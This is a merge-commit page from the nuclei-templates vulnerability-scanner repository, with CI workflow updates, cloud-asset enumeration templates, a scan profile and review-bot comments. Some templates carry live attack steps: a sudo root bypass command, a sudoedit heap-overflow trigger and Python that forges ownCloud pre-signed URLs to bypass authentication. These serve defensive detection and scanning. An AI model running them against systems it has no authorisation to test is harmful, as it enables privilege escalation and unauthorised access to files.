Merge branch 'main' into main

patch-1
Dhiyaneshwaran 2024-01-04 12:01:25 +05:30 committed by GitHub
commit d4da7bab7f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2278 changed files with 16373 additions and 9004 deletions


@ -17,7 +17,7 @@ jobs:
- name: checkout repo content - name: checkout repo content
uses: actions/checkout@v4 # checkout the repository content uses: actions/checkout@v4 # checkout the repository content
- name: setup python - name: setup python
uses: actions/setup-python@v4 uses: actions/setup-python@v5
with: with:
python-version: '3.10' # install the python version needed python-version: '3.10' # install the python version needed
- name: install python packages - name: install python packages


@ -15,7 +15,7 @@ jobs:
steps: steps:
- uses: actions/checkout@master - uses: actions/checkout@master
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.19 go-version: 1.19


@ -22,7 +22,7 @@ jobs:
fetch-depth: 0 fetch-depth: 0
- name: Set up Python - name: Set up Python
uses: actions/setup-python@v4 uses: actions/setup-python@v5
with: with:
python-version: "3.8" python-version: "3.8"


@ -18,7 +18,7 @@ jobs:
fetch-depth: 0 fetch-depth: 0
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.21.x go-version: 1.21.x


@ -12,7 +12,7 @@ jobs:
if: github.repository == 'projectdiscovery/nuclei-templates' if: github.repository == 'projectdiscovery/nuclei-templates'
steps: steps:
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.21.x go-version: 1.21.x


@ -17,7 +17,7 @@ jobs:
fetch-depth: 0 fetch-depth: 0
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.21.x go-version: 1.21.x


@ -15,7 +15,7 @@ jobs:
fetch-depth: 0 fetch-depth: 0
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.21.x go-version: 1.21.x
@ -25,5 +25,5 @@ jobs:
- name: Template Validation - name: Template Validation
run: | run: |
cp -r ${{ github.workspace }} $HOME cp -r ${{ github.workspace }} $HOME
nuclei -duc -validate -allow-local-file-access nuclei -duc -validate -allow-local-file-access -et /home/runner/nuclei-templates/config/.git -et /home/runner/nuclei-templates/config
nuclei -duc -validate -w ./workflows -allow-local-file-access nuclei -duc -validate -w ./workflows -allow-local-file-access -et /home/runner/nuclei-templates/config/.git -et /home/runner/nuclei-templates/config
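Review bot: The two added `-et` exclusions in the Template Validation step hard-code `/home/runner/nuclei-templates/config`, which only matches while the runner's home is `/home/runner` and the checkout directory is named `nuclei-templates`. The step already copies the workspace into `$HOME`, so `-et "$HOME/nuclei-templates/config"` would at least follow the home directory. The other exclusion, `/home/runner/nuclei-templates/config/.git`, lies under the directory that is already excluded, so it looks redundant unless the repository's top-level `.git` was intended; that is worth confirming. The job definition starts outside this hunk.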


@ -13,7 +13,7 @@ jobs:
fetch-depth: 0 fetch-depth: 0
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.21.x go-version: 1.21.x


@ -15,7 +15,7 @@ jobs:
fetch-depth: 0 fetch-depth: 0
- name: Set up Go - name: Set up Go
uses: actions/setup-go@v4 uses: actions/setup-go@v5
with: with:
go-version: 1.19 go-version: 1.19

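--- a/.github/workflows/templates-sync.yml
+++ b/.github/workflows/templates-sync.yml
@@ -0,0 +1,32 @@
+name: Sync Repositories Workflow
+on:
+push:
+paths:
+- '.new-additions'
+- 'http/cves/2015/CVE-2015-2794.yaml'
+- 'http/cves/2023/CVE-2023-42343.yaml'
+- 'http/cves/2023/CVE-2023-46574.yaml'
+- 'http/exposures/docker-daemon-exposed.yaml'
+- 'http/token-spray/api-openai.yaml'
+- 'http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml'
+- 'http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml'
+- 'http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml'
+- 'cloud/enum/aws-app-enum.yaml'
+- 'cloud/enum/aws-s3-bucket-enum.yaml'
+- 'cloud/enum/azure-db-enum.yaml'
+- 'cloud/enum/azure-vm-cloud-enum.yaml'
+- 'cloud/enum/azure-website-enum.yaml'
+- 'cloud/enum/gcp-app-engine-enum.yaml'
+- 'cloud/enum/gcp-bucket-enum.yaml'
+- 'cloud/enum/gcp-firebase-app-enum.yaml'
+- 'cloud/enum/gcp-firebase-rtdb-enum.yaml'
+- 'http/cves/2023/CVE-2023-41109.yaml'
+- 'network/misconfig/erlang-daemon.yaml'
+workflow_dispatch:
+jobs:
+triggerRemoteWorkflow:
+runs-on: ubuntu-latest
+steps:
+- name: Trigger Remote Workflow with curl
+run: |
+curl -i -s -k -X 'POST' -H 'Host: api.github.com' -H "Authorization: token ${{ secrets.GTOKEN }}" --data-binary $'{\"ref\":\"main\"}' 'https://api.github.com/repos/projectdiscovery/early-templates/actions/workflows/reposync.yml/dispatches'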
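Review bot: The `curl` call in the "Trigger Remote Workflow with curl" step passes `-k`, which turns off TLS certificate verification on the same request that carries `secrets.GTOKEN` in the Authorization header, so the token would be handed to any endpoint able to intercept the connection. `-i` also writes the response headers into the job log, and without `--fail` the step reports success even when the API rejects the request. I would drop `-k`, `-i` and the redundant `Host` header: `curl --fail -sS -X POST -H "Authorization: token ${{ secrets.GTOKEN }}" --data-binary '{"ref":"main"}' 'https://api.github.com/repos/projectdiscovery/early-templates/actions/workflows/reposync.yml/dispatches'`. The scope of GTOKEN is not visible on this page; it should be limited to dispatching that one workflow.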


@ -14,7 +14,7 @@ jobs:
fetch-depth: 0 # otherwise, you will failed to push refs to dest repo fetch-depth: 0 # otherwise, you will failed to push refs to dest repo
- name: Install Python3 - name: Install Python3
uses: actions/setup-python@v4 uses: actions/setup-python@v5
with: with:
python-version: "3.10" python-version: "3.10"
- run: | - run: |


@ -1,33 +1,27 @@
headless/cves/2018/CVE-2018-25031.yaml cloud/enum/aws-app-enum.yaml
http/cves/2023/CVE-2023-22232.yaml cloud/enum/aws-s3-bucket-enum.yaml
http/cves/2023/CVE-2023-3368.yaml cloud/enum/azure-db-enum.yaml
http/cves/2023/CVE-2023-36144.yaml cloud/enum/azure-vm-cloud-enum.yaml
http/cves/2023/CVE-2023-39002.yaml cloud/enum/azure-website-enum.yaml
http/cves/2023/CVE-2023-43177.yaml cloud/enum/gcp-app-engine-enum.yaml
http/cves/2023/CVE-2023-49070.yaml cloud/enum/gcp-bucket-enum.yaml
http/cves/2023/CVE-2023-5556.yaml cloud/enum/gcp-firebase-app-enum.yaml
http/cves/2023/CVE-2023-6018.yaml cloud/enum/gcp-firebase-rtdb-enum.yaml
http/cves/2023/CVE-2023-6020.yaml code/cves/2019/CVE-2019-14287.yaml
http/cves/2023/CVE-2023-6021.yaml code/cves/2021/CVE-2021-3156.yaml
http/cves/2023/CVE-2023-6380.yaml http/cves/2015/CVE-2015-2794.yaml
http/default-logins/dataease/dataease-default-login.yaml http/cves/2020/CVE-2020-12124.yaml
http/default-logins/splunk/splunk-default-login.yaml http/cves/2023/CVE-2023-41109.yaml
http/exposed-panels/dataease-panel.yaml http/cves/2023/CVE-2023-42343.yaml
http/exposed-panels/reportico-admin-panel.yaml http/cves/2023/CVE-2023-46574.yaml
http/exposed-panels/tailon-panel.yaml http/cves/2023/CVE-2023-50968.yaml
http/exposures/configs/dompdf-config.yaml http/cves/2023/CVE-2023-51467.yaml
http/misconfiguration/installer/businesso-installer.yaml http/exposures/docker-daemon-exposed.yaml
http/misconfiguration/installer/chamilo-installer.yaml http/misconfiguration/cookies-without-httponly.yaml
http/misconfiguration/installer/knowledgetree-installer.yaml http/misconfiguration/php/php-composer-binary.yaml
http/misconfiguration/installer/phpgedview-installer.yaml http/token-spray/api-openai.yaml
http/misconfiguration/installer/wowcms-installer.yaml http/vulnerabilities/dahua/dahua-icc-backdoor-user.yaml
http/misconfiguration/secnet-info-leak.yaml http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml
http/technologies/element-web-detect.yaml http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml
http/technologies/matrix-homeserver-detect.yaml http/vulnerabilities/yonyou/yonyou-ksoa-dept-sqli.yaml
http/vulnerabilities/dahua/dahua-wpms-lfi.yaml network/misconfig/erlang-daemon.yaml
http/vulnerabilities/dahua/dahua-wpms-rce.yaml
http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml
http/vulnerabilities/huawei/huawei-authhttp-lfi.yaml
http/vulnerabilities/other/yibao-sqli.yaml
http/vulnerabilities/other/yunanbao-rce.yaml
javascript/cves/2023/CVE-2023-46604.yaml


@ -40,20 +40,20 @@ An overview of the nuclei template project, including statistics on unique tags,
## Nuclei Templates Top 10 statistics ## Nuclei Templates Top 10 statistics
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|-------------------|-------|----------|-------|------|-------| |-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2271 | dhiyaneshdk | 1109 | http | 6856 | info | 3326 | file | 312 | | cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 |
| panel | 1034 | dwisiswant0 | 800 | file | 312 | high | 1439 | dns | 18 | | panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 |
| wordpress | 929 | daffainfo | 787 | workflows | 191 | medium | 1429 | | | | wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | |
| xss | 845 | pikpikcu | 353 | network | 133 | critical | 906 | | | | xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | |
| exposure | 833 | pussycat0x | 307 | ssl | 27 | low | 245 | | | | exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | |
| wp-plugin | 811 | ritikchaddha | 293 | javascript | 20 | unknown | 32 | | | | wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | |
| osint | 675 | pdteam | 283 | dns | 17 | | | | | | osint | 677 | pdteam | 286 | dns | 17 | | | | |
| tech | 645 | ricardomaia | 229 | headless | 10 | | | | | | tech | 649 | ricardomaia | 229 | headless | 11 | | | | |
| lfi | 614 | geeknik | 221 | code | 2 | | | | | | lfi | 619 | geeknik | 224 | code | 3 | | | | |
| edb | 598 | theamanrawat | 221 | contributors.json | 1 | | | | | | edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | |
**525 directories, 7843 files**. **534 directories, 7902 files**.
</td> </td>
</tr> </tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff


@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|-------------------|-------|----------|-------|------|-------| |-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
| cve | 2271 | dhiyaneshdk | 1109 | http | 6856 | info | 3326 | file | 312 | | cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 |
| panel | 1034 | dwisiswant0 | 800 | file | 312 | high | 1439 | dns | 18 | | panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 |
| wordpress | 929 | daffainfo | 787 | workflows | 191 | medium | 1429 | | | | wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | |
| xss | 845 | pikpikcu | 353 | network | 133 | critical | 906 | | | | xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | |
| exposure | 833 | pussycat0x | 307 | ssl | 27 | low | 245 | | | | exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | |
| wp-plugin | 811 | ritikchaddha | 293 | javascript | 20 | unknown | 32 | | | | wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | |
| osint | 675 | pdteam | 283 | dns | 17 | | | | | | osint | 677 | pdteam | 286 | dns | 17 | | | | |
| tech | 645 | ricardomaia | 229 | headless | 10 | | | | | | tech | 649 | ricardomaia | 229 | headless | 11 | | | | |
| lfi | 614 | geeknik | 221 | code | 2 | | | | | | lfi | 619 | geeknik | 224 | code | 3 | | | | |
| edb | 598 | theamanrawat | 221 | contributors.json | 1 | | | | | | edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | |


@ -0,0 +1,37 @@
id: aws-app-enum
info:
name: AWS Apps - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for AWS apps (WorkDocs, WorkMail, Connect, etc.)
metadata:
verified: true
max-request: 1
tags: cloud,cloud-enum,aws
self-contained: true
variables:
BaseDNS: "awsapps.com"
http:
- raw:
- |
GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers:
- type: status
name: "Registered AWS App"
status:
- 200
- 302
condition: or
# digest: 490a0046304402206cc21deaf3d479badf5b8b46dbe3448bd60ec76fc64503726d554051cca8a9bc02204dba37b6781d1c66eca341ac1c6c7a5041cfb376832d862700a864cc91af8870:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,41 @@
id: aws-s3-bucket-enum
info:
name: AWS S3 Buckets - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for open and protected buckets in AWS S3
metadata:
verified: true
max-request: 1
tags: cloud,cloud-enum,aws
self-contained: true
variables:
BaseDNS: "s3.amazonaws.com"
http:
- raw:
- |
GET http://{{wordlist}}.{{BaseDNS}} HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers-condition: or
matchers:
- type: status
name: "Open AWS S3 Bucket"
status:
- 200
- type: status
name: "Protected AWS S3 Bucket"
status:
- 403
# digest: 4b0a00483046022100c0cbb1d95cb9a7d7b9bd7a4bf578af739426ab59afa3faa001104c29c4ff999e022100cdfc9930e3c0ae01086792f1391ff33c22070722d3bd874d1e3f87f31c938a17:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,32 @@
id: azure-db-enum
info:
name: Azure Databases - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for Azure databases via their registered DNS names
metadata:
verified: true
max-request: 1
tags: cloud,cloud-enum,azure
self-contained: true
variables:
BaseDNS: "database.windows.net"
dns:
- name: "{{wordlist}}.{{BaseDNS}}"
type: A
class: inet
recursion: true
attack: batteringram
matchers:
- type: word
part: answer
words:
- "IN\tA"
# digest: 4a0a004730450221008d5f64c419db15f1c1bce4a802f395bdcc44847f878890831869236c37a1678002205d7502015cece8506d34b9c319643441e334856c7fd34e1baa70a6a6942f134e:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,65 @@
id: azure-vm-cloud-enum
info:
name: Azure Virtual Machines - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for Azure virtual machines via their registered DNS names.
metadata:
verified: true
tags: cloud,cloud-enum,azure
self-contained: true
variables:
BaseDNS: "cloudapp.azure.com"
regionname:
- eastasia
- southeastasia
- centralus
- eastus
- eastus2
- westus
- northcentralus
- southcentralus
- northeurope
- westeurope
- japanwest
- japaneast
- brazilsouth
- australiaeast
- australiasoutheast
- southindia
- centralindia
- westindia
- canadacentral
- canadaeast
- uksouth
- ukwest
- westcentralus
- westus2
- koreacentral
- koreasouth
- francecentral
- francesouth
- australiacentral
- australiacentral2
- southafricanorth
- southafricawest
dns:
- name: "{{wordlist}}.{{regionname}}.{{BaseDNS}}"
type: A
class: inet
recursion: true
attack: batteringram
matchers:
- type: word
part: answer
words:
- "IN\tA"
# digest: 4b0a004830460221008d223bfdb3585e335e8282ca206945a6f7704dab4a2899d3410229bf0db7132d022100b9de9af2b393a559575b67a5b25b6334fe8cddd1ceed5059ee634dc3b0292d50:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,36 @@
id: azure-website-enum
info:
name: Azure Websites - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for Azure websites that are registered and responding.
metadata:
verified: true
tags: cloud,azure
self-contained: true
variables:
BaseDNS: "azurewebsites.net"
http:
- raw:
- |
GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers:
- type: status
name: "Available Azure Website"
status:
- 200
- 302
condition: or
# digest: 490a00463044022001ff1a4cff9e33f3817df1e824a00e35f76c6f8e22cd34e3616e452978dc46f702200913c7710eba2b3df98325a1bb7da86b55cde6d4a3d7199a7d952f1f7988a3fa:922c64590222798bb761d5b6d8e72950
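Review bot: The `tags` line in this template is `cloud,azure`, while the other enumeration templates added in this commit (for example azure-db-enum and azure-vm-cloud-enum) carry `cloud,cloud-enum,azure`, so a scan or an exclusion filtered on the `cloud-enum` tag would not cover this one. Suggest `tags: cloud,cloud-enum,azure`. Because the file ends in a `# digest:` signature line, the template would presumably need re-signing after the edit.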


@ -0,0 +1,42 @@
id: gcp-app-engine-enum
info:
name: GCP App Engine (Appspot) - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for App Engine Apps in GCP.
metadata:
verified: true
tags: cloud,cloud-enum,gcp
self-contained: true
variables:
BaseDNS: "appspot.com"
loginRedirect: "accounts.google.com"
http:
- raw:
- |
GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers:
- type: dsl
name: "Open GCP App Engine App"
dsl:
- "status_code==200"
- type: dsl
name: "Protected GCP App Engine App"
dsl:
- "status_code==302"
- contains(location, "login")
condition: and
# digest: 490a0046304402204edc5a3fc90ff80b8397219e37a716d5b582c9821dbb0edda2c52c585aa241ca022067b0c7178f7f345975f765bdd56afc967505028e459ed113c8fbd450a1dcb76a:922c64590222798bb761d5b6d8e72950
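Review bot: The variable `loginRedirect: "accounts.google.com"` is declared but never referenced; the "Protected GCP App Engine App" matcher tests `contains(location, "login")` instead, which accepts any 302 whose Location merely contains the word "login". Either remove the variable or use it in the matcher, e.g. `- contains(location, loginRedirect)` (assuming template variables resolve inside DSL expressions here, which should be confirmed), so that only redirects to the declared sign-in host are labelled as protected apps. The file ends in a `# digest:` line, so it would presumably need re-signing after the change.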


@ -0,0 +1,39 @@
id: gcp-bucket-enum
info:
name: GCP Buckets - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for open and protected buckets in GCP.
metadata:
verified: true
tags: cloud,cloud-enum,gcp
self-contained: true
variables:
BaseDNS: "storage.googleapis.com"
http:
- raw:
- |
GET http://{{wordlist}}.{{BaseDNS}} HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers:
- type: status
name: "Open GCP Bucket"
status:
- 200
- type: status
name: "Protected GCP Bucket"
status:
- 403
# digest: 490a004630440220549241cfe0dbdadf24bcbdabd6cbf8e82a45bea577710e8409da53f3bdef37d202203bab8b09dea7b68aafc32f8214b331ee6dc4dbe85c0e7a34693b8062dec6fb6a:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,34 @@
id: gcp-firebase-app-enum
info:
name: GCP Firebase Apps - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for Firebase Apps in GCP.
metadata:
verified: true
tags: cloud,cloud-enum,gcp
self-contained: true
variables:
BaseDNS: "firebaseapp.com"
http:
- raw:
- |
GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers:
- type: status
name: "Open GCP Firebase App"
status:
- 200
# digest: 490a004630440220721a516d58d71b3c20990c97c22986fd212caafa366f2641bdb4fe9df0a53f9802205ecd4bfcda0808d5002e9d1194e0ec0f4d2b2f2140170c0df4ffb11372a6470f:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,50 @@
id: gcp-firebase-rtdb-enum
info:
name: GCP Firebase Realtime Database - Cloud Enumeration
author: initstring
severity: info
description: |
Searches for Firebase Realtime Databases in GCP.
metadata:
verified: true
tags: cloud,cloud-enum,gcp
self-contained: true
variables:
BaseDNS: "firebaseio.com"
http:
- raw:
- |
GET https://{{wordlist}}.{{BaseDNS}}/.json HTTP/1.1
Host: {{wordlist}}.{{BaseDNS}}
redirects: false
attack: batteringram
threads: 10
matchers-condition: or
matchers:
- type: status
name: "Open GCP Firebase RTDB"
status:
- 200
- type: status
name: "Protected GCP Firebase RTDB"
status:
- 401
- type: status
name: "Payment GCP on Google Firebase RTDB"
status:
- 402
- type: status
name: "Deactivated GCP Firebase RTDB"
status:
- 423
# digest: 490a0046304402200dcb47ae02c77c619eea0d95a6ab7dc9f2be071cea09abee3a7ab748b11e561c022034956ced05346f9cfcc9d425d92fa1242c979572e8ae02030496597f64ccfe82:922c64590222798bb761d5b6d8e72950


@ -0,0 +1,39 @@
id: CVE-2019-14287
info:
name: Sudo <= 1.8.27 - Security Bypass
author: daffainfo
severity: high
description: |
In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
- https://www.exploit-db.com/exploits/47502
metadata:
verified: true
max-request: 2
vendor: canonical
product: ubuntu_linux
tags: cve,cve2019,sudo,code,linux,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
whoami
- engine:
- sh
- bash
source: |
sudo -u#-1 whoami
matchers:
- type: dsl
dsl:
- '!contains(code_1_response, "root")'
- 'contains(code_2_response, "root")'
condition: and
# digest: 4b0a004830460221009a6464ce800ea5ccd047c283f312c0742d1000b41b1fc9ab9405dbb1e732f546022100e8c25b8a624190544f16221aab038c76af13d15cf331598437e9fe53a3353c25:922c64590222798bb761d5b6d8e72950
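Review bot: Both DSL conditions use substring matching on the command output, so `!contains(code_1_response, "root")` makes the template skip any account whose name merely contains "root", and `contains(code_2_response, "root")` accepts any second-step output that contains that word, such as an error message, rather than the exact `whoami` result. Comparing the trimmed output for equality would give fewer false results, if this DSL offers a trim helper (to be confirmed). The second step also calls `sudo` without `-n`, so on a host where the account needs a password the scan may sit on a prompt; `sudo -n -u#-1 whoami` fails immediately instead.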


@ -0,0 +1,31 @@
id: CVE-2021-3156
info:
name: Sudo Baron Samedit - Local Privilege Escalation
author: pussycat0x
severity: high
description: |
Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character.
reference:
- https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
- https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
- https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff
metadata:
verified: true
tags: cve,cve2021,sudo,code,linux,privesc,local
self-contained: true
code:
- engine:
- sh
- bash
source: |
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
matchers:
- type: word
words:
- "malloc(): memory corruption"
- "Aborted (core dumped)"
condition: and
# digest: 490a004630440220403cc295d817a1432233bcdffd5874db501002624cbd50c1002bfc06e3ae86bb022007b2f6d4f86e3fab7f53cb5c73eacd4ab22b91801f6ba5109885d3b9a294220a:922c64590222798bb761d5b6d8e72950
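Review bot: This check works by actually corrupting the heap of `sudoedit` on the scanned host and then requiring both `malloc(): memory corruption` and `Aborted (core dumped)` in the output, so it is intrusive and tied to the exact allocator and shell wording; a vulnerable host that aborts with a different message would be reported as clean. The `source` line also depends on `python3`, which the template does not state. At minimum the `description` should say that the check crashes sudoedit and may leave a core dump, and a comment next to `engine` should note the interpreter requirement, as the CVE-2023-49105 template in this commit does with `# requires python to be pre-installed on system running nuclei`.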


@ -0,0 +1,89 @@
id: CVE-2023-49105
info:
name: OwnCloud - WebDAV API Authentication Bypass
author: ChristianPoeschl,FlorianDewald,usdAG
severity: critical
description: |
An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
reference:
- https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/
- https://github.com/0xfed/ownedcloud
- https://owncloud.org/security
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-49105
cwe-id: CWE-287
epss-score: 0.00091
epss-percentile: 0.38353
cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: owncloud
product: owncloud
shodan-query: title:"owncloud"
tags: cve,cve2023,owncloud,code,auth-bypass
variables:
username: admin
code:
- engine:
- py
- python3 # requires python to be pre-installed on system running nuclei
source: |
# build signature for presigned urls
import base64, hashlib, datetime, os
from urllib.parse import urlencode
username = os.getenv('username')
base_url = os.getenv('BaseURL')
dav_url = f'{base_url}/remote.php/dav/files/{username}'
oc_date = datetime.datetime.now().strftime('%Y-%m-%dT%H:%M:%SZ')
data = {
'OC-Expires': '991200',
'OC-Verb': 'PROPFIND',
'OC-Credential': username,
'OC-Date': oc_date
}
sig_url = f'{dav_url}?{urlencode(data)}'
# derive signature from empty sign key
dk = hashlib.pbkdf2_hmac('sha512', sig_url.encode(), b'', 10000, dklen=32)
final_url = f'/remote.php/dav/files/{username}?{urlencode(data)}&OC-Signature={dk.hex()}'
#final_url = f'{sig_url}&OC-Signature={dk.hex()}'
print(final_url)
http:
- raw:
- |
PROPFIND {{code_response}} HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
Authorization: Basic {{base64('{{username}}')}}
matchers-condition: or
matchers:
- type: dsl
name: bypass-correct-user
dsl:
- status_code == 207
- contains(body, 'owncloud.org')
condition: and
- type: word
name: bypass-wrong-user
part: body
words:
- User unknown
- Sabre
- Exception
- NotAuthenticated
condition: and
extractors:
- type: dsl
dsl:
- '"Username => "+ username'
# digest: 4a0a00473045022100f17bb3bb403b74c4e84e6190df79bf767df834017742b4b95607de42a3d948bb02205f2f1de3f09d31920d6bf102ba93c1ad271809327b5997d8d58e9f97f2886c11:922c64590222798bb761d5b6d8e72950
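Review bot: The `bypass-wrong-user` matcher fires when the body contains `User unknown`, `Sabre`, `Exception` and `NotAuthenticated`, which by its name appears to be the case where the supplied username does not exist, yet under `matchers-condition: or` it is reported at the template's `critical` severity just like the `bypass-correct-user` case. Whoever triages the results has to tell the two apart, so the `description` should state what each matcher name means and that the default `username: admin` may need overriding. The commented-out line `#final_url = f'{sig_url}&OC-Signature={dk.hex()}'` in `source` is dead code and can be removed. The file ends in a `# digest:` line, so it would presumably need re-signing after any edit.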

88
config/recommended.yml Normal file

@ -0,0 +1,88 @@
# This is a configuration file for the recommended template profile.
# Additional configuration profiles can be created for different types of nuclei scans.
# They should be placed under the 'config' directory at:
# https://github.com/projectdiscovery/nuclei-templates
# Here is an example of how to use a config profile:
# nuclei -config config/recommended.yml -list target_list_to_scan.txt
exclude-severity:
- info
exclude-tags:
- tech
- dos
- fuzz
- creds-stuffing
- token-spray
exclude-protocols:
- ssl
- dns
- file
- code
- whois
- headless
- workflow
exclude-id:
- CVE-2021-45967
- CVE-2021-36380
- CVE-2021-33544
- CVE-2021-32305
- CVE-2021-31755
- CVE-2021-28164
- CVE-2021-27931
- CVE-2021-26855
- CVE-2021-25052
- CVE-2021-1498
- CVE-2020-7796
- CVE-2020-5775
- CVE-2020-35713
- CVE-2020-26919
- CVE-2020-25223
- CVE-2020-24148
- CVE-2020-10770
- CVE-2019-9978
- CVE-2019-8451
- CVE-2019-3929
- CVE-2019-2767
- CVE-2019-2616
- CVE-2019-20224
- CVE-2019-19824
- CVE-2019-10758
- CVE-2018-16167
- CVE-2018-15517
- CVE-2018-1000600
- CVE-2017-9506
- CVE-2017-3506
- CVE-2017-18638
- CVE-2016-1555
- CVE-2015-8813
- CVE-2014-3206
- CVE-2009-4223
- CNVD-2021-09650
- generic-tokens
- credentials-disclosure
- targa-camera-ssrf
- cloudflare-external-image-resize
- linkerd-ssrf-detection
- ssrf-via-oauth-misconfig
- tls-sni-proxy
- xmlrpc-pingback-ssrf
- hashicorp-consul-rce
- mirai-unknown-rce
- optilink-ont1gew-gpon-rce
- sar2html-rce
- zimbra-preauth-ssrf
- wp-under-construction-ssrf
- wp-xmlrpc-pingback-detection
- fastjson-1-2-41-rce
- fastjson-1-2-42-rce
- fastjson-1-2-43-rce
- fastjson-1-2-62-rce
- fastjson-1-2-67-rce
- fastjson-1-2-68-rce
- request-based-interaction
- open-proxy-internal
- open-proxy-localhost
- open-proxy-portscan


@ -223,7 +223,7 @@
